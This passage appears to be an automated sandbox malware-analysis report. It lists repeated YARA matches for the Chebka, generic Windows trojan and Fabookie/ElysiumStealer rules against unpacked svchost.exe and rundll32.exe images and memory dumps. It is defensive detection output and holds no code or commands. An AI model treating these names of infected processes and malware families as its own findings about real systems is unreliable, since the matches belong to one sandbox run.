        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: Yara match, File source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
